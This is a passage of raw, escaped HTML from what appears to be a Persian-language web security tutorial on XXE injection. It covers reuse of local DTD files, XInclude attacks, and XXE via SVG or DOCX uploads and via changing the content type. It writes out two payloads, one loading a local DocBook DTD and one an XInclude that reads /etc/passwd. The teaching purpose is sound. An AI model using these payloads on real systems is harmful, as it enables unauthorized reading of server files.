\u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u063a\u06cc\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645<\/span><\/h5>\n\u0627\u0632 \u0622\u0646\u062c\u0627\u06cc\u06cc \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u0627\u06cc\u0646 \u0646\u0648\u0639 \u062d\u0645\u0644\u0647 XXE \u0628\u0627\u06cc\u062f \u0627\u0632 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u06a9\u0647 \u0627\u0632 \u0642\u0628\u0644 \u0631\u0648\u06cc \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u0633\u0631\u0648\u0631 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u0628\u0647 \u0635\u0648\u0631\u062a \u063a\u06cc\u0631\u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645\u060c \u06cc\u0627\u0641\u062a\u0646 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 \u0645\u0646\u0627\u0633\u0628 \u0636\u0631\u0648\u0631\u06cc \u0627\u0633\u062a. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u0639\u0645\u0648\u0644\u0627 \u0628\u062f\u0648\u0646 \u062f\u0631\u062f\u0633\u0631 \u0648 \u0628\u0647 \u0622\u0633\u0627\u0646\u06cc \u0642\u0627\u0628\u0644 \u0627\u0646\u062c\u0627\u0645 \u0627\u0633\u062a. \u0627\u0632 \u0622\u0646\u200c\u062c\u0627\u06cc\u06cc \u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0646 \u062c\u0627 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u067e\u06cc\u0627\u0645\u200c\u0647\u0627\u06cc \u062e\u0637\u0627\u06cc \u062a\u0648\u0644\u06cc\u062f \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u067e\u0627\u0631\u0633\u0631 XML \u0631\u0627 \u0628\u0631\u0645\u06cc\u200c\u06af\u0631\u062f\u0627\u0646\u062f\u060c \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc DTD \u0644\u0648\u06a9\u0627\u0644 \u0631\u0627 Enumerate \u06a9\u0646\u06cc\u062f\u061b \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u06a9\u0627\u0641\u06cc\u200c\u0627\u0633\u062a \u0633\u0639\u06cc \u06a9\u0646\u06cc\u062f \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627 \u0631\u0627 \u0627\u0632 \u062f\u0627\u062e\u0644 DTD \u062f\u0627\u062e\u0644\u06cc \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0646\u06cc\u062f\u061b \u0627\u06af\u0631 \u0641\u0627\u06cc\u0644 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f \u0627\u0632 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u0645\u062a\u0648\u062c\u0647 \u0622\u0646 \u062e\u0648\u0627\u0647\u06cc\u062f \u0634\u062f\u060c \u0648 \u0627\u06af\u0631 \u0641\u0627\u06cc\u0644 \u0648\u062c\u0648\u062f \u062f\u0627\u0634\u062a \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627\u06cc\u06cc \u0646\u0645\u06cc\u200c\u06af\u06cc\u0631\u06cc\u062f.\n\n\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633\u06cc \u06a9\u0647 \u0627\u0632 \u0645\u062d\u06cc\u0637 \u062f\u0633\u06a9\u062a\u0627\u067e GNOME \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0645\u0639\u0645\u0648\u0644\u0627 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u062f\u0631 \u0622\u062f\u0631\u0633 \/usr\/share\/yelp\/dtd\/docbookx.dtd \u062f\u0627\u0631\u0646\u062f. \u0634\u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627 \u062b\u0628\u062a \u067e\u06cc\u200c\u0644\u0648\u062f XXE \u0632\u06cc\u0631 \u0645\u062a\u0648\u062c\u0647 \u0634\u0648\u06cc\u062f \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u06cc\u0627 \u0646\u0647\u060c \u0686\u0648\u0646 \u0627\u06af\u0631 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f\u060c \u06cc\u06a9 \u0627\u0631\u0648\u0631 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f3c070f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f3c070f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c670df5\" data-id=\"c670df5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0e312a7 elementor-widget elementor-widget-text-editor\" data-id=\"0e312a7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong> &lt;!DOCTYPE foo [<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!ENTITY % local_dtd SYSTEM &#8220;file:\/\/\/usr\/share\/yelp\/dtd\/docbookx.dtd&#8221;&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>%local_dtd;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>]&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1c4d393 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1c4d393\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-56eb403\" data-id=\"56eb403\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fb37796 elementor-widget elementor-widget-text-editor\" data-id=\"fb37796\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646 \u06a9\u0647 \u0644\u06cc\u0633\u062a\u06cc \u0627\u0632 \u0622\u062f\u0631\u0633\u200c\u0647\u0627\u06cc \u0631\u0627\u06cc\u062c \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc DTD \u0631\u0627 \u0627\u0645\u062a\u062d\u0627\u0646 \u06a9\u0631\u062f\u06cc\u062f \u0648 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 \u067e\u06cc\u062f\u0627 \u0634\u062f\u060c \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u06a9\u067e\u06cc \u0627\u0632 \u0622\u0646 \u0628\u0647 \u062f\u0633\u062a \u0628\u06cc\u0627\u0648\u0631\u06cc\u062f \u062a\u0627 \u0628\u062a\u0648\u0627\u0646\u06cc\u062f \u0622\u0646 \u0631\u0627 \u0628\u062e\u0648\u0627\u0646\u06cc\u062f \u0648 \u062f\u0631 \u0622\u0646 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0628\u06cc\u0627\u0628\u06cc\u062f \u06a9\u0647 \u0628\u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0648\u0628\u0627\u0631\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f. \u0627\u0632 \u0622\u0646\u200c\u062c\u0627\u06cc\u06cc \u06a9\u0647 \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0631\u0627\u06cc\u062c \u062f\u0627\u0631\u0627\u06cc \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc DTD \u0645\u062a\u0646 \u0628\u0627\u0632 \u0647\u0633\u062a\u0646\u062f\u060c \u0645\u0639\u0645\u0648\u0644\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627 \u06cc\u06a9 \u062c\u0633\u062a\u062c\u0648 \u062f\u0631 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u06cc\u06a9 \u06a9\u067e\u06cc \u0627\u0632 \u0641\u0627\u06cc\u0644 DTD \u0645\u0648\u0631\u062f \u0646\u0638\u0631 \u0628\u06cc\u0627\u0628\u06cc\u062f.\n<h3 id=\"attack-surface\"><span style=\"font-size: 18pt;\">\u0646\u062d\u0648\u0647 \u06cc\u0627\u0641\u062a\u0646 \u062f\u0627\u0631\u0627\u06cc\u06cc\u200c\u0647\u0627\u06cc \u0645\u0633\u062a\u0639\u062f \u062a\u0632\u0631\u06cc\u0642 XXE\u00a0<\/span><\/h3>\n\u0633\u0637\u062d \u062d\u0645\u0644\u0647\u200c\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE Injection \u062f\u0631 \u0628\u0633\u06cc\u0627\u0631\u06cc \u0645\u0648\u0627\u0631\u062f \u0648\u0627\u0636\u062d \u0627\u0633\u062a\u060c \u0686\u0648\u0646 \u062a\u0631\u0627\u0641\u06cc\u06a9 HTTP \u0645\u0639\u0645\u0648\u0644\u06cc \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u062d\u0627\u0648\u06cc \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627\u06cc\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u062e\u0648\u062f \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0628\u0627 \u0642\u0627\u0644\u0628 XML \u062f\u0627\u0631\u0646\u062f. \u062f\u0631 \u0645\u0648\u0627\u0631\u062f \u062f\u06cc\u06af\u0631\u060c \u0633\u0637\u062d \u062d\u0645\u0644\u0647 \u0631\u0627 \u0633\u062e\u062a\u200c\u062a\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u062f\u06cc\u062f. \u0628\u0627 \u0627\u06cc\u0646 \u0648\u062c\u0648\u062f \u0627\u06af\u0631 \u062f\u0631 \u062c\u0627\u0647\u0627\u06cc \u062f\u0631\u0633\u062a \u0628\u06af\u0631\u062f\u06cc\u062f\u060c \u0633\u0637\u062d \u062d\u0645\u0644\u0647\u200c\u06cc XXE \u0631\u0627 \u062f\u0631 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06cc\u0627\u0628\u06cc\u062f \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0647\u06cc\u0686 \u062f\u0627\u062f\u0647\u200c\u0627\u06cc \u0628\u0627 \u0642\u0627\u0644\u0628 XML \u0646\u06cc\u0633\u062a\u0646\u062f.\n<h4 id=\"xinclude\"><span style=\"font-size: 12pt;\">\u062d\u0645\u0644\u0627\u062a XInclude\u00a0<\/span><\/h4>\n\u0628\u0631\u062e\u06cc \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646\u200c\u0647\u0627 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062b\u0628\u062a\u200c\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u06a9\u0644\u0627\u06cc\u0646\u062a \u0631\u0627 \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0622\u0646 \u0631\u0627 \u062f\u0631 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u062f\u0631 \u06cc\u06a9 \u0633\u0646\u062f XML \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f\u060c \u0648 \u0633\u067e\u0633 \u0633\u0646\u062f \u0631\u0627 Parse \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f. \u06cc\u06a9 \u0645\u062b\u0627\u0644 \u0627\u0632 \u0627\u06cc\u0646 \u0641\u0631\u0627\u06cc\u0646\u062f \u0632\u0645\u0627\u0646\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062b\u0628\u062a\u200c\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u06a9\u0644\u0627\u06cc\u0646\u062a \u062f\u0631 \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a \u0628\u06a9\u200c\u0627\u0646\u062f SOAP \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0648 \u0633\u067e\u0633 \u0627\u06cc\u0646 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a \u062a\u0648\u0633\u0637 \u0633\u0631\u0648\u06cc\u0633 \u0628\u06a9\u200c\u0627\u0646\u062f SOAP \u067e\u0631\u062f\u0627\u0632\u0634 \u0645\u06cc\u200c\u0634\u0648\u062f.\n\u062f\u0631 \u0686\u0646\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637\u06cc \u0646\u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u0631\u0648\u0634 \u0633\u0646\u062a\u06cc \u062d\u0645\u0644\u0647 XXE \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f\u060c \u0632\u06cc\u0631\u0627 \u0633\u0646\u062f XML \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u062f\u0631 \u06a9\u0646\u062a\u0631\u0644 \u0634\u0645\u0627 \u0646\u06cc\u0633\u062a \u0648 \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0646\u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062a\u06af DOCTYPE \u0631\u0627 \u062a\u0639\u0631\u06cc\u0641 \u06cc\u0627 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u06a9\u0646\u06cc\u062f. \u0628\u0627 \u0627\u06cc\u0646 \u0648\u062c\u0648\u062f\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u062c\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0627\u0632 XInclude \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f. XInclude \u0628\u062e\u0634\u06cc \u0627\u0632 \u0632\u0628\u0627\u0646 XML \u0627\u0633\u062a \u06a9\u0647 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u06cc\u06a9 \u0633\u0646\u062f XML\u060c \u0627\u0632 \u0686\u0646\u062f\u06cc\u0646 \u0632\u06cc\u0631-\u0633\u0646\u062f \u06cc\u0627 sub-document \u062a\u0634\u06a9\u06cc\u0644 \u0634\u0648\u062f. \u0634\u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062d\u0645\u0644\u0647 XInclude \u0631\u0627 \u062c\u0627\u06cc \u0647\u0631 \u062f\u0627\u062f\u0647\u200c\u0627\u06cc \u062f\u0631 \u06cc\u06a9 \u0633\u0646\u062f XML \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f\u060c \u0648 \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u062d\u062a\u06cc \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637\u06cc \u06a9\u0647 \u0641\u0642\u0637 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u06cc\u06a9 \u0622\u06cc\u062a\u0645 \u062f\u0627\u062f\u0647 \u0631\u0627 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u06cc\u06a9 \u0633\u0646\u062f XML \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f\u060c \u0628\u0627\u0632 \u0647\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f.\n\u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647 XInclude\u060c \u0628\u0627\u06cc\u062f \u0627\u0628\u062a\u062f\u0627 \u0645\u0631\u062c\u0639 namespace \u06cc\u0627 \u0641\u0636\u0627\u06cc \u0646\u0627\u0645 XInclude \u0631\u0627 \u0645\u0634\u062e\u0635 \u06a9\u0646\u06cc\u062f\u060c \u0648 \u0628\u0639\u062f \u0645\u0633\u06cc\u0631 \u0641\u0627\u06cc\u0644\u06cc \u0631\u0627 \u06a9\u0647 \u0645\u06cc\u200c\u062e\u0648\u0627\u0647\u06cc\u062f include \u06a9\u0646\u06cc\u062f (\u0641\u0627\u06cc\u0644\u06cc \u0631\u0627 \u06a9\u0647 \u0628\u0647 \u0633\u0646\u062f \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f) \u062a\u0639\u06cc\u06cc\u0646 \u06a9\u0646\u06cc\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8dadd1b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8dadd1b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5a53d0f\" data-id=\"5a53d0f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8a7668b elementor-widget elementor-widget-text-editor\" data-id=\"8a7668b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;foo xmlns:xi=&#8221;http:\/\/www.w3.org\/2001\/XInclude&#8221;&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;xi:include parse=&#8221;text&#8221; href=&#8221;file:\/\/\/etc\/passwd&#8221;\/&gt;&lt;\/foo&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8971c2c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8971c2c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-04dc5d7\" data-id=\"04dc5d7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cb95748 elementor-widget elementor-widget-text-editor\" data-id=\"cb95748\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h4 id=\"file-upload\">\u062d\u0645\u0644\u0627\u062a XXE \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0622\u067e\u0644\u0648\u062f \u0641\u0627\u06cc\u0644<\/h4>\n\u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646\u200c\u0647\u0627 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u062c\u0627\u0632\u0647\u200c\u06cc \u0622\u067e\u0644\u0648\u062f \u0641\u0627\u06cc\u0644 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f \u0648 \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627 \u067e\u0633 \u0627\u0632 \u0622\u067e\u0644\u0648\u062f\u060c \u062f\u0631 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u067e\u0631\u062f\u0627\u0632\u0634 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f. \u0628\u0631\u062e\u06cc \u0627\u0632 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0641\u0627\u06cc\u0644 \u0631\u0627\u06cc\u062c \u0627\u0632 XML \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06cc\u0627 \u062d\u0627\u0648\u06cc \u0627\u062c\u0632\u0627\u06cc\u06cc \u062f\u0627\u062e\u0644\u06cc \u0647\u0633\u062a\u0646\u062f \u06a9\u0647 \u0627\u0632 XML \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u0627\u0633\u0646\u0627\u062f Office \u0645\u0627\u0646\u0646\u062f Docx \u06cc\u0627 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u062a\u0635\u0648\u06cc\u0631 \u0645\u0627\u0646\u0646\u062f SVG \u0627\u0632 XML \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.\n\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u0641\u0631\u0636 \u06a9\u0646\u06cc\u062f \u06cc\u06a9 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u062c\u0627\u0632\u0647\u200c\u06cc \u0622\u067e\u0644\u0648\u062f \u062a\u0635\u0648\u06cc\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f\u060c \u0648 \u0627\u06cc\u0646 \u062a\u0635\u0627\u0648\u06cc\u0631 \u0631\u0627 \u067e\u0633 \u0627\u0632 \u0622\u067e\u0644\u0648\u062f\u060c \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u067e\u0631\u062f\u0627\u0632\u0634 \u06cc\u0627 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u062d\u062a\u06cc \u0627\u06af\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0627\u0646\u062a\u0638\u0627\u0631 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f \u06a9\u0647 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u062f PNG \u06cc\u0627 JPEG \u0631\u0627 \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0646\u062f\u060c \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647\u200c\u06cc \u067e\u0631\u062f\u0627\u0632\u0634 \u062a\u0635\u0648\u06cc\u0631\u06cc \u06a9\u0647 \u062f\u0631 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u062f\u0647\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0627\u0632 \u062a\u0635\u0627\u0648\u06cc\u0631 \u0628\u0627 \u0642\u0627\u0644\u0628 SVG \u0647\u0645 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u06a9\u0646\u062f. \u0627\u0632 \u0622\u0646\u200c\u062c\u0627\u06cc\u06cc \u06a9\u0647 \u0642\u0627\u0644\u0628 SVG \u0627\u0632 XML \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u06cc\u06a9 \u062a\u0635\u0648\u06cc\u0631 SVG \u0645\u062e\u0631\u0628 \u062f\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u062b\u0628\u062a \u06a9\u0646\u062f \u062a\u0627 \u0628\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0633\u0637\u062d \u062d\u0645\u0644\u0647\u200c\u06cc \u067e\u0646\u0647\u0627\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u062f\u0633\u062a \u067e\u06cc\u062f\u0627 \u06a9\u0646\u062f.\n<h4 id=\"content-format\">\u062d\u0645\u0644\u0627\u062a XXE \u0627\u0632 \u0637\u0631\u06cc\u0642 \u062a\u063a\u06cc\u06cc\u0631 \u0646\u0648\u0639 \u0645\u062d\u062a\u0648\u0627<\/h4>\n\u0627\u06a9\u062b\u0631 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627\u06cc POST \u0627\u0632 \u06cc\u06a9 \u0646\u0648\u0639 \u0645\u062d\u062a\u0648\u0627\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0647 \u062a\u0648\u0633\u0637 \u0641\u0631\u0645\u200c\u0647\u0627\u06cc HTML \u062a\u0648\u0644\u06cc\u062f \u0634\u062f\u0647 \u0627\u0633\u062a\u061b \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 application\/x-www-form-urlencoded. \u0628\u0631\u062e\u06cc \u0627\u0632 \u0648\u0628\u0633\u0627\u06cc\u062a\u200c\u0647\u0627 \u0627\u0646\u062a\u0638\u0627\u0631 \u062f\u0627\u0631\u0646\u062f \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a\u200c\u0647\u0627 \u0631\u0627 \u062f\u0631 \u0627\u06cc\u0646 \u0642\u0627\u0644\u0628 \u062e\u0627\u0635 \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0646\u0646\u062f\u060c \u0648\u0644\u06cc \u0627\u0646\u0648\u0627\u0639 \u062f\u06cc\u06af\u0631 \u0645\u062d\u062a\u0648\u0627 \u0627\u0632 \u062c\u0645\u0644\u0647 \u0645\u062d\u062a\u0648\u0627\u06cc XML \u0631\u0627 \u0646\u06cc\u0632 \u0642\u0628\u0648\u0644 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.\n\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0627\u06af\u0631 \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a \u0645\u0639\u0645\u0648\u0644\u06cc \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u0627\u06cc \u0632\u06cc\u0631 \u0628\u0627\u0634\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3ee0931 